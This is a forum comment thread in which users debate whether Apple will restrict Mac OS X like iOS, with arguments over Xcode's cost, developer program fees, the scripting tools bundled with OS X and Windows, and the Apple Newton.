Wake me when they actually make it so you cannot execute scripts in OSX. Bonus points if you can explain how you're gonna make Flash movies or do any sort of programming on a Mac with iOS-like restrictions.
Re: (Score:2)
explain how you're gonna make Flash movies or do any sort of programming on a Mac with iOS-like restrictions.
That is something that only professionals who are willing to pay a premium for their computers need. All those home users can just get by with applications from the App Store.
The Apple concept of computing is that home users should treat their computers like appliances: plug it in, and never worry about technical details. Sure, professional and "power" users demand more, but they represent a very small fraction of Apple's target market at this point, and Apple can get away with charging them more (t
Re: (Score:3)
And yet, Apple Desktops and Laptops come with a fairly complete BSD Unix toolset, including several scripting languages (perl, python, ruby, shell, probably some others I don't know about, applescript, automator, a gcc compiler...
How much of that stuff can you get on Windows' default install?
Now, it's apparently true that Xcode is no longer a free download (although I suspect it's still on Snow Leopard install disks...), but let's wait to see what the next version has to offer before we assume they're just
Re: (Score:2)
Xcode is most certainly still a free download. Sure you have to register for the Mac Developer program but that's really not that big of a deal. You probably have an Apple ID already so signing up is just a matter of logging into your Apple account.
http://developer.apple.com/xcode/
"Download Xcode 4 for Free. Xcode 4 is a free download for all members of the iOS and Mac Developer Programs. Log in to your account to begin the download."
Now developing anything for iOS is a whole different ball of wax.
Re: (Score:2)
The Mac Developer program is now $99/year.
Re: (Score:2)
Oops, that's right. It's XCode3 you can still download without paying anything. As others have pointed out they're still shipping XCode 3 on the install disks.
Burried at the bottom of that page is this "Looking for Xcode 3? Download Now" which directs you to log into a Apple Developer Connection account, which is free to get.
Re: (Score:2)
As for Mac OS X shipping with a BSD toolset, this was mainly to allow App
Re: (Score:2)
*cough* tcl/tk *cough*
Though I'm surprised, I'm glad OSX still ships with it. I like tcl personally.
Re: (Score:2)
How much of that stuff can you get on Windows' default install?
JScript/VBScript interpreters, C#/VB.NET/JScript.NET compilers, PowerShell, MSBuild.
Re: (Score:2, Interesting)
Bonus points if you can explain how you're gonna make Flash movies or do any sort of programming on a Mac with iOS-like restrictions.
Same way you do programming on the iPhone: pay $100/year for a developer license.
And if you think they aren't going down that road already, remember how developer tools used to come with the Mac OS X DVD?
You can no longer download Xcode for free. It now costs $5 and is only available with an Apple account off the Mac OS X App Store. (Or free from the App Store if you already have a developer license, but you still need to get it through the App Store.)
Apple is already down the path to locking down Mac OS X.
Re: (Score:2)
I don't agree that Apple is on the way to locking down the Mac like iOS.
But your assertion that it's impossible somehow is just silly. How are apps developed for iOS? Special developer licenses. If Apple wanted to do it, they could. The only thing keeping them from doing it is momentum of public will. Users would revolt if they changed the system now. There was no entrenched freedom when Apple entered the mobile world. Well, except for users of mobile platforms that predate iOS like Windows Mobile, b
Re: (Score:2)
How are apps developed for iOS?
They are written on machines that aren't locked down like iOS. You cannot, for example, create an iPhone app from the iPhone or any other iOS device. Nothing is created on iOS devices because Apple explicitly forbids running 'execeutable' types of data.
If Apple wanted to do it, they could. The only thing keeping them from doing it is momentum of public will.
That and the fact that OSX wasn't designed to run in such a restricted mode. The customers would not be able to run anything they have now!
Nobody has really thought through the ramifications of trying to actually maintain something like a desktop OS with i
Re: (Score:2)
Apple entered the mobile world in the early 90's with the Newton. By 1997 it actually didn't suck. With addons it could make phone calls, etc. Kind of a pity it was axed, the OS was neat. Handwriting recognition sucked horridly from the onset and the device's rep never recovered, even after they got it working fairly well on the StrongARM-based MP2000 and MP2100 after a couple updates. The SA110@162-220Mhz was no slouch for those days in a handheld. 2 PCMCIA slots ruled too. What they missed is most